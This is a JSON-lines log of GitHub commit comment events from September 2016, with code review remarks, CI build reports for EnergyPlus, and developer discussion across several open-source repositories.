{"id":"4565915668","type":"CommitCommentEvent","actor":{"login":"whiteBaijs"},"repo":{"name":"whiteBaijs/lunbo"},"payload":{"comment":{"id":19030115,"position":null,"line":null,"path":null,"commit_id":"14c39aa08115c0a0559192f6115ef84963b84f86","created_at":"2016-09-15T03:30:46Z","updated_at":"2016-09-15T03:30:46Z","body":"轮播无缝滚动\r\n运用jQuery实现"}},"created_at":"2016-09-15T03:30:46Z"}
{"id":"4565915736","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19030116,"position":null,"line":null,"path":null,"commit_id":"8b8226a4796b6cc30e977e8d8828d38d92452211","created_at":"2016-09-15T03:30:47Z","updated_at":"2016-09-15T03:30:47Z","body":"makingPrettyTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2362 of 2369 tests passed, 24 test warnings)\n\n * 10 tests had: AUD diffs.\n * 31 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n * 21 tests had: EIO diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T03:30:47Z"}
{"id":"4565916897","type":"CommitCommentEvent","actor":{"login":"whiteBaijs"},"repo":{"name":"whiteBaijs/lunbo"},"payload":{"comment":{"id":19030118,"position":null,"line":null,"path":null,"commit_id":"14c39aa08115c0a0559192f6115ef84963b84f86","created_at":"2016-09-15T03:31:17Z","updated_at":"2016-09-15T03:31:17Z","body":"轮播无缝滚动\r\n运用jQuery实现"}},"created_at":"2016-09-15T03:31:17Z"}
{"id":"4565917569","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19030120,"position":null,"line":null,"path":null,"commit_id":"104c1d77ad71b0529fbe46063bc59b0252fdad43","created_at":"2016-09-15T03:31:36Z","updated_at":"2016-09-15T03:31:36Z","body":"Btw, I'm curious will upsource understand our planned explicit public visibility mode and do not mark all these ↓ publics redundant?"}},"created_at":"2016-09-15T03:31:36Z"}
{"id":"4565920729","type":"CommitCommentEvent","actor":{"login":"whiteBaijs"},"repo":{"name":"whiteBaijs/lunbo"},"payload":{"comment":{"id":19030124,"position":null,"line":null,"path":null,"commit_id":"14c39aa08115c0a0559192f6115ef84963b84f86","created_at":"2016-09-15T03:33:04Z","updated_at":"2016-09-15T03:33:04Z","body":"轮播无缝滚动\r\n运用jQuery实现"}},"created_at":"2016-09-15T03:33:04Z"}
{"id":"4565934611","type":"CommitCommentEvent","actor":{"login":"GangaNaresh"},"repo":{"name":"ampproject/amphtml"},"payload":{"comment":{"id":19030151,"position":null,"line":null,"path":null,"commit_id":"e20a067e8f784136426600cdcee6b7db801acae7","created_at":"2016-09-15T03:39:24Z","updated_at":"2016-09-15T03:39:24Z","body":"Looks like 'data-param-href' is still needed for sharing on Facebook. It does not properly pick the canonical url.  Without href attribute it shows - Error\r\nApp Not Set Up: This app is still in development mode, and you don't have access to it. Switch to a registered test user or ask an app admin for permissions."}},"created_at":"2016-09-15T03:39:24Z"}
{"id":"4565935591","type":"CommitCommentEvent","actor":{"login":"AlexHill"},"repo":{"name":"stephenmcd/mezzanine"},"payload":{"comment":{"id":19030152,"position":null,"line":null,"path":null,"commit_id":"0bf71df211f70da08a6988808795f163ae01f248","created_at":"2016-09-15T03:39:54Z","updated_at":"2016-09-15T03:39:54Z","body":"I feel like maybe I'm missing something. What's the difference between `B` and `C`? AFAIK they are the same. Doesn't `overextends` behave in exactly the same way as pre-1.9 `extends`, except when a template tries to extend a template with its own name?"}},"created_at":"2016-09-15T03:39:54Z"}
{"id":"4565936410","type":"CommitCommentEvent","actor":{"login":"samueldcw"},"repo":{"name":"samueldcw/html"},"payload":{"comment":{"id":19030153,"position":null,"line":null,"path":null,"commit_id":"742cbbde7227b2abb91d71e4eb39638b22188b8b","created_at":"2016-09-15T03:40:15Z","updated_at":"2016-09-15T03:40:15Z","body":";z;f;"}},"created_at":"2016-09-15T03:40:15Z"}
{"id":"4565937258","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030155,"position":null,"line":null,"path":null,"commit_id":"2c56daac8710602e5a1bb43b01453a14077c4f85","created_at":"2016-09-15T03:40:37Z","updated_at":"2016-09-15T03:40:37Z","body":"Related to: backdrop/backdrop-issues#940 "}},"created_at":"2016-09-15T03:40:37Z"}
{"id":"4565937268","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030156,"position":null,"line":null,"path":null,"commit_id":"ae47da111438ec590d6070904454a4a67011e0a7","created_at":"2016-09-15T03:40:37Z","updated_at":"2016-09-15T03:40:37Z","body":"Related to: backdrop/backdrop-issues#940 "}},"created_at":"2016-09-15T03:40:37Z"}
{"id":"4565937277","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19030157,"position":null,"line":null,"path":null,"commit_id":"9ab6e43e7af2eab82c506f1f06c261bf74d58e50","created_at":"2016-09-15T03:40:37Z","updated_at":"2016-09-15T03:40:37Z","body":"Related to: backdrop/backdrop-issues#940 "}},"created_at":"2016-09-15T03:40:37Z"}
{"id":"4565942184","type":"CommitCommentEvent","actor":{"login":"AZaps"},"repo":{"name":"AZaps/Scribe-Swift"},"payload":{"comment":{"id":19030161,"position":null,"line":null,"path":null,"commit_id":"876b87f2b6f5d724209fc949e32f7a5801a9471d","created_at":"2016-09-15T03:42:43Z","updated_at":"2016-09-15T03:42:43Z","body":"Added delegates for all the textFields, Views, and datePicker to allow updates. Page scrolls with each element to be at the top when editing. Custom dismissal keyboard for textView. Changed how dates are received in strings. Instead of coming from the Quest class, an extension of NSDate() was made to support some basic conversions for easier use."}},"created_at":"2016-09-15T03:42:43Z"}
{"id":"4565943985","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19030162,"position":16,"line":17,"path":"src/System.Security.Cryptography.Algorithms/src/System.Security.Cryptography.Algorithms.csproj","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T03:43:30Z","updated_at":"2016-09-15T03:43:30Z","body":"TargetGroup will never be netstandard1.7 since in theory for ns1.7 it should be empty as that is the default. If ns1.7 build has been working without this arg, I wonder if net463 still needs it? In any case, I would either remove this property entirely if it's not needed anymore, or remove/fix the condition otherwise."}},"created_at":"2016-09-15T03:43:30Z"}
{"id":"4565944546","type":"CommitCommentEvent","actor":{"login":"dbqt"},"repo":{"name":"Microsquad/gitpizza"},"payload":{"comment":{"id":19030165,"position":null,"line":null,"path":null,"commit_id":"2aa866e3609202bb754199cffded611162f74d11","created_at":"2016-09-15T03:43:46Z","updated_at":"2016-09-15T03:43:46Z","body":"That demo tho"}},"created_at":"2016-09-15T03:43:46Z"}
{"id":"4565947780","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":19030175,"position":null,"line":null,"path":null,"commit_id":"b812176a8d1a9d86956f4d97c3fa0fa5336947c8","created_at":"2016-09-15T03:45:18Z","updated_at":"2016-09-15T03:45:18Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#YCLy-6olRsi4EDUU9lNYEg"}},"created_at":"2016-09-15T03:45:18Z"}
{"id":"4565948716","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19030177,"position":null,"line":null,"path":null,"commit_id":"6360880f393f41f4c4570530a67e9a6e0d068b7f","created_at":"2016-09-15T03:45:43Z","updated_at":"2016-09-15T03:45:43Z","body":"You might want to remove lines 465 and 466"}},"created_at":"2016-09-15T03:45:43Z"}
{"id":"4565956681","type":"CommitCommentEvent","actor":{"login":"mitrais-cdc-cpp"},"repo":{"name":"mitrais-cdc-cpp/Nemsta"},"payload":{"comment":{"id":19030194,"position":null,"line":null,"path":null,"commit_id":"7b89037c12a61e07e3eac73b3dcf50a09a851063","created_at":"2016-09-15T03:49:23Z","updated_at":"2016-09-15T03:49:23Z","body":"excellent, that looks better :)"}},"created_at":"2016-09-15T03:49:23Z"}
{"id":"4565956697","type":"CommitCommentEvent","actor":{"login":"VladimirMangos"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19030195,"position":21,"line":4988,"path":"src/game/Spell.cpp","commit_id":"80d6be8249709e7baef65384d4d5f120db2ead44","created_at":"2016-09-15T03:49:23Z","updated_at":"2016-09-15T03:49:23Z","body":"Maybe use GetTypeId() instead for consistent with other case and speed."}},"created_at":"2016-09-15T03:49:23Z"}
{"id":"4565956926","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19030196,"position":null,"line":null,"path":null,"commit_id":"0997ad0eec80c2609a372526bdfc30604541ec0c","created_at":"2016-09-15T03:49:30Z","updated_at":"2016-09-15T03:49:30Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - i386-Windows-7-VisualStudio-12: OK (2335 of 2336 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T03:49:30Z"}
{"id":"4565958196","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19030198,"position":4,"line":6,"path":"src/System.Security.Cryptography.Algorithms/tests/System.Security.Cryptography.Algorithms.Tests.builds","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T03:50:05Z","updated_at":"2016-09-15T03:50:05Z","body":"It's fine to remove the x-compilation for the src and remove the depproj's for ref, but in tests we still want to continue x-compiling and running the tests against the older version of the assembly. For that reason, I would keep this netcoreapp1.0 test builds/runs. That said, when testing for netcoreapp1.0, it shouldn't be necesarry to pass in TargetGroup nor TestTFMs since they should be the default. I would expect this code to look like:\r\n```xml\r\n  <ItemGroup>\r\n    <Project Include=\"System.Security.Cryptography.Algorithms.Tests.csproj\">\r\n      <OSGroup>Unix</OSGroup>\r\n    </Project>\r\n    <Project Include=\"System.Security.Cryptography.Algorithms.Tests.csproj\">\r\n      <TargetGroup>netstandard1.7</TargetGroup>\r\n      <TestTFMs>netcoreapp1.1</TestTFMs>\r\n      <OSGroup>Unix</OSGroup>\r\n    </Project>\r\n    <Project Include=\"System.Security.Cryptography.Algorithms.Tests.csproj\">\r\n      <OSGroup>Windows_NT</OSGroup>\r\n    </Project>\r\n    <Project Include=\"System.Security.Cryptography.Algorithms.Tests.csproj\">\r\n      <TargetGroup>netstandard1.7</TargetGroup>\r\n      <TestTFMs>netcoreapp1.1;net463</TestTFMs>\r\n      <OSGroup>Windows_NT</OSGroup>\r\n    </Project>\r\n  </ItemGroup>\r\n```"}},"created_at":"2016-09-15T03:50:05Z"}
{"id":"4565958299","type":"CommitCommentEvent","actor":{"login":"VladimirMangos"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19030200,"position":90,"line":7276,"path":"src/game/Spell.cpp","commit_id":"80d6be8249709e7baef65384d4d5f120db2ead44","created_at":"2016-09-15T03:50:08Z","updated_at":"2016-09-15T03:50:08Z","body":"Maybe use GetTypeId() instead for consistent with other case and speed."}},"created_at":"2016-09-15T03:50:08Z"}
{"id":"4565960452","type":"CommitCommentEvent","actor":{"login":"slashiee"},"repo":{"name":"Radfordhound/SLW-Mod-Loader"},"payload":{"comment":{"id":19030206,"position":5,"line":133,"path":"SLWModLoader/src/MainForm.cs","commit_id":"083b0b73c4e25f1fcfa27203581aaf716077a61b","created_at":"2016-09-15T03:51:08Z","updated_at":"2016-09-15T03:51:08Z","body":"To @blueskythlikesclouds - Make SaveModsDb actually work"}},"created_at":"2016-09-15T03:51:08Z"}
{"id":"4565960559","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19030207,"position":4,"line":14,"path":"src/System.Security.Cryptography.Algorithms/tests/System.Security.Cryptography.Algorithms.Tests.csproj","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T03:51:11Z","updated_at":"2016-09-15T03:51:11Z","body":"You don't need this line. If TargetGroup is set to netstandard1.7, then NugetTargetMoniker will be already set by dir.props correctly"}},"created_at":"2016-09-15T03:51:11Z"}
{"id":"4565960651","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19030209,"position":32,"line":186,"path":"src/tools/imgtool/library.cpp","commit_id":"ab20ce42286f9f388c1fc97af78a0e50278b7c21","created_at":"2016-09-15T03:51:13Z","updated_at":"2016-09-15T03:51:13Z","body":"You don't actually need to capture `this` here :P"}},"created_at":"2016-09-15T03:51:13Z"}
{"id":"4565962635","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19030215,"position":10,"line":18,"path":"src/System.Security.Cryptography.Cng/src/System.Security.Cryptography.Cng.csproj","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T03:52:09Z","updated_at":"2016-09-15T03:52:09Z","body":"Don't you still need this for net463?"}},"created_at":"2016-09-15T03:52:09Z"}
{"id":"4565963875","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19030220,"position":null,"line":null,"path":null,"commit_id":"ab921e392bd06cd1fa8be04fcb192f89e6cb82d0","created_at":"2016-09-15T03:52:43Z","updated_at":"2016-09-15T03:52:43Z","body":"no errors build works normal"}},"created_at":"2016-09-15T03:52:43Z"}
{"id":"4565964642","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19030222,"position":4,"line":6,"path":"src/System.Security.Cryptography.Cng/tests/System.Security.Cryptography.Cng.Tests.builds","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T03:53:05Z","updated_at":"2016-09-15T03:53:05Z","body":"Same comment as with Algorithms, you want to keep the tests running against netcoreapp1.0"}},"created_at":"2016-09-15T03:53:05Z"}
{"id":"4565966712","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19030227,"position":5,"line":20,"path":"src/System.Security.Cryptography.Cng/tests/System.Security.Cryptography.Cng.Tests.csproj","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T03:54:01Z","updated_at":"2016-09-15T03:54:01Z","body":"I didn't check if you have it like these in your other Crypto projects, but this is the right way to reference the source from a test project :+1: "}},"created_at":"2016-09-15T03:54:01Z"}
{"id":"4565967453","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":19030228,"position":46,"line":13,"path":"test/sched.js","commit_id":"952cfe62ff8721784fa8a8c12e48b2ae143ce04f","created_at":"2016-09-15T03:54:23Z","updated_at":"2016-09-15T03:54:23Z","body":"a better should statement for this might be \"should not start automatically\""}},"created_at":"2016-09-15T03:54:23Z"}
{"id":"4565967665","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19030229,"position":4,"line":6,"path":"src/System.Security.Cryptography.OpenSsl/tests/System.Security.Cryptography.OpenSsl.Tests.builds","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T03:54:29Z","updated_at":"2016-09-15T03:54:29Z","body":"Same here, keep netcoreapp1.0"}},"created_at":"2016-09-15T03:54:29Z"}
{"id":"4565968855","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":19030231,"position":54,"line":21,"path":"test/sched.js","commit_id":"952cfe62ff8721784fa8a8c12e48b2ae143ce04f","created_at":"2016-09-15T03:55:07Z","updated_at":"2016-09-15T03:55:07Z","body":"You will want to have some sort of wait here"}},"created_at":"2016-09-15T03:55:07Z"}
{"id":"4565970192","type":"CommitCommentEvent","actor":{"login":"pshires"},"repo":{"name":"ORNL-BTRIC/EnergyPlus"},"payload":{"comment":{"id":19030236,"position":85,"line":1147,"path":"src/EnergyPlus/InputProcessor.cc","commit_id":"8065010d69962d2b6809a49526f16069e1490e1f","created_at":"2016-09-15T03:55:43Z","updated_at":"2016-09-15T03:55:43Z","body":"@mbadams5 made this change yesterday except he called it auto const & find_default, why is it in this commit? I'm also a bit confused by you dereferencing json iterators using the deference operator at line 1152 of this commit. I assume that produces the desired result of getting the value, but it seems like .value() is a more readable way to get the same result. "}},"created_at":"2016-09-15T03:55:43Z"}
{"id":"4565970223","type":"CommitCommentEvent","actor":{"login":"ryneeverett"},"repo":{"name":"stephenmcd/mezzanine"},"payload":{"comment":{"id":19030237,"position":null,"line":null,"path":null,"commit_id":"0bf71df211f70da08a6988808795f163ae01f248","created_at":"2016-09-15T03:55:43Z","updated_at":"2016-09-15T03:55:43Z","body":"Nevermind, I get it now. My mental model of how template inheritance worked was overcomplicated and I was having trouble adjusting to the new consistency/simplicity."}},"created_at":"2016-09-15T03:55:43Z"}
{"id":"4565970369","type":"CommitCommentEvent","actor":{"login":"DevangiDesai"},"repo":{"name":"layerhq/Atlas-iOS"},"payload":{"comment":{"id":19030238,"position":null,"line":null,"path":null,"commit_id":"0f66a8b87c27528fb69089d6e528ee8557a4f165","created_at":"2016-09-15T03:55:48Z","updated_at":"2016-09-15T03:55:48Z","body":"With this fix i am getting crash \r\n\r\nAssertion failure in -[ATLConversationCollectionView _endItemAnimationsWithInvalidationContext:tentativelyForReordering:], /SourceCache/UIKit_Sim/UIKit-3347.44.2/UICollectionView.m:4056\r\n2016-09-14 13:16:49.957 cooliyo[34756:5923579] *** Terminating app due to uncaught exception 'NSInternalInconsistencyException', reason: 'Invalid update: invalid number of sections.  The number of sections contained in the collection view after the update (4) must be equal to the number of sections contained in the collection view before the update (4), plus or minus the number of sections inserted or deleted (1 inserted, 0 deleted).'\r\n\r\nCrashes everytime when i want send message."}},"created_at":"2016-09-15T03:55:48Z"}
{"id":"4565970453","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19030239,"position":null,"line":null,"path":null,"commit_id":"fdf374875bf6e0a63c182c33d1824ff36605901a","created_at":"2016-09-15T03:55:50Z","updated_at":"2016-09-15T03:55:50Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-15T03:55:50Z"}
{"id":"4565970937","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19030240,"position":4,"line":6,"path":"src/System.Security.Cryptography.Primitives/pkg/System.Security.Cryptography.Primitives.pkgproj","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T03:56:02Z","updated_at":"2016-09-15T03:56:02Z","body":"Why are we doing this here? Don't we also need to update the assembly version in this case? I don't see a change in the reference assembly, so I'm not sure I understand why do we need this."}},"created_at":"2016-09-15T03:56:02Z"}
{"id":"4565974189","type":"CommitCommentEvent","actor":{"login":"knrafto"},"repo":{"name":"Cal-CS-61A-Staff/ok"},"payload":{"comment":{"id":19030243,"position":23,"line":66,"path":"server/templates/staff/jobs/job.html","commit_id":"8a8afa88457c61bc019e89b01edc4c2dd1a7dcc6","created_at":"2016-09-15T03:57:30Z","updated_at":"2016-09-15T03:57:30Z","body":"The comment says 3 seconds, but this is 4.5?"}},"created_at":"2016-09-15T03:57:30Z"}
{"id":"4565974883","type":"CommitCommentEvent","actor":{"login":"easyfish"},"repo":{"name":"jolane/easy-fish"},"payload":{"comment":{"id":19030247,"position":null,"line":null,"path":null,"commit_id":"6d493575ec59325c5e2f0936116fe20529f37cb6","created_at":"2016-09-15T03:57:48Z","updated_at":"2016-09-15T03:57:48Z","body":"caps lock with a space, to lowercase no space."}},"created_at":"2016-09-15T03:57:48Z"}
{"id":"4565976219","type":"CommitCommentEvent","actor":{"login":"Sumukh"},"repo":{"name":"Cal-CS-61A-Staff/ok"},"payload":{"comment":{"id":19030249,"position":23,"line":66,"path":"server/templates/staff/jobs/job.html","commit_id":"8a8afa88457c61bc019e89b01edc4c2dd1a7dcc6","created_at":"2016-09-15T03:58:25Z","updated_at":"2016-09-15T03:58:25Z","body":"Whoops. I decided to bump it at the last moment to handle slow connections. I'll fix that. "}},"created_at":"2016-09-15T03:58:25Z"}
{"id":"4565979022","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19030252,"position":null,"line":null,"path":null,"commit_id":"8b8226a4796b6cc30e977e8d8828d38d92452211","created_at":"2016-09-15T03:59:34Z","updated_at":"2016-09-15T03:59:34Z","body":"makingPrettyTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1189 of 1189 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-15T03:59:34Z"}
{"id":"4565981361","type":"CommitCommentEvent","actor":{"login":"lemona2008"},"repo":{"name":"lemona2008/Datasciencecoursera"},"payload":{"comment":{"id":19030257,"position":null,"line":null,"path":null,"commit_id":"33615c4e77edf128db1a465ca41df290686e2d18","created_at":"2016-09-15T04:00:25Z","updated_at":"2016-09-15T04:00:25Z","body":"git clone and push"}},"created_at":"2016-09-15T04:00:25Z"}
{"id":"4565981827","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19030258,"position":null,"line":null,"path":null,"commit_id":"8b8226a4796b6cc30e977e8d8828d38d92452211","created_at":"2016-09-15T04:00:37Z","updated_at":"2016-09-15T04:00:37Z","body":"makingPrettyTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T04:00:37Z"}
{"id":"4565982636","type":"CommitCommentEvent","actor":{"login":"Maddieee"},"repo":{"name":"illinois-cs241/illinois-cs241.github.io"},"payload":{"comment":{"id":19030266,"position":null,"line":null,"path":null,"commit_id":"2df8c174f8ab2cbd457958642e16e1535505ab1b","created_at":"2016-09-15T04:00:57Z","updated_at":"2016-09-15T04:00:57Z","body":"Wrong commit message, should be add mini_valgrind pics"}},"created_at":"2016-09-15T04:00:57Z"}
{"id":"4565985014","type":"CommitCommentEvent","actor":{"login":"pshires"},"repo":{"name":"ORNL-BTRIC/EnergyPlus"},"payload":{"comment":{"id":19030269,"position":85,"line":1147,"path":"src/EnergyPlus/InputProcessor.cc","commit_id":"8065010d69962d2b6809a49526f16069e1490e1f","created_at":"2016-09-15T04:02:02Z","updated_at":"2016-09-15T04:02:02Z","body":"Also I guess it will be sort of easy to make identical changes that others have already made in this refactoring stage in general, and nobody likes to waste time! How can we communicate better since we don't all sit 5 feet away from each other everyday anymore. Maybe github can do notifications on OSX? @kburova @mbadams5 "}},"created_at":"2016-09-15T04:02:02Z"}
{"id":"4565985081","type":"CommitCommentEvent","actor":{"login":"ps2"},"repo":{"name":"EnhancedRadioDevices/915MHzEdisonExplorer_SW"},"payload":{"comment":{"id":19030270,"position":null,"line":null,"path":null,"commit_id":"728ec95e0650ae7405d9675ecec84cdac35a8818","created_at":"2016-09-15T04:02:04Z","updated_at":"2016-09-15T04:02:04Z","body":"Morgan, I just spent almost a week on getting this working.  Turns out the code that both you and I started with is targeting the cc2430, and what the cc-debugger does is actually quite a bit different.\r\n\r\nI used a logic analyzer (Salaea logic) to turn the levels into bytes using its SPI parser, and then wrote some code (https://github.com/ps2/riled_up_tools/blob/master/ccprog/parse_debug.rb) to turn those bytes into a protocol and assembly level view: https://gist.github.com/ps2/8694b78571f2cbf061d2c1797434fa5d\r\n\r\nAfter I figured out what it was doing, I updated the code to to mimic it, and I'm now getting flash dumps that match the flash writes: https://github.com/ps2/riled_up_tools/blob/master/ccprog/ccprog.c\r\n\r\nSince I was flailing so much getting it working, the code is a mess.  I hope to clean it up next week sometime.\r\n\r\nI wanted to let you know the swamps I've slogged through so you don't have to.  You can see in the code that the DUP_ registers are all different, that DMA is set up differently, and that even the cc-debugger commands are different in places."}},"created_at":"2016-09-15T04:02:04Z"}
{"id":"4566002701","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19030297,"position":null,"line":null,"path":null,"commit_id":"c6a5bac3b25ab75c405491f66b5e1e372d08b5e8","created_at":"2016-09-15T04:09:53Z","updated_at":"2016-09-15T04:09:53Z","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: OK (1761 of 1761 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T04:09:53Z"}
{"id":"4566005878","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19030306,"position":null,"line":null,"path":null,"commit_id":"6360880f393f41f4c4570530a67e9a6e0d068b7f","created_at":"2016-09-15T04:11:18Z","updated_at":"2016-09-15T04:11:18Z","body":"hahaha this is bad, fixed in https://github.com/puppylinux-woof-CE/woof-CE/commit/7c67992934744754ddc97d62ba493063dab6ad06\r\n\r\ni'll take a look at all my commits today before going to sleep, but i assume this is the only mistake as i kept the testing and fixing the other files i edited"}},"created_at":"2016-09-15T04:11:18Z"}
{"id":"4566013891","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"babymannen/theforgottenserver-7.4"},"payload":{"comment":{"id":19030315,"position":null,"line":null,"path":null,"commit_id":"9b01f8bb3abe95df0c3c8012a72c6ebe0fed3db3","created_at":"2016-09-15T04:14:57Z","updated_at":"2016-09-15T04:14:57Z","body":"https://github.com/babymannen/theforgottenserver-7.4/blob/9b01f8bb3abe95df0c3c8012a72c6ebe0fed3db3/src/map.cpp#L862"}},"created_at":"2016-09-15T04:14:57Z"}
{"id":"4566019080","type":"CommitCommentEvent","actor":{"login":"mimrc-RongJun"},"repo":{"name":"iPaySoft/iPayStudy"},"payload":{"comment":{"id":19030322,"position":10,"line":10,"path":"JavaProject/src/math/TestListToArray.java","commit_id":"9dad71e5b816683d33646c0419332add29fa090f","created_at":"2016-09-15T04:17:06Z","updated_at":"2016-09-15T04:17:06Z","body":"![img](http://pic28.nipic.com/20130424/10679686_093946442141_2.jpg)"}},"created_at":"2016-09-15T04:17:06Z"}
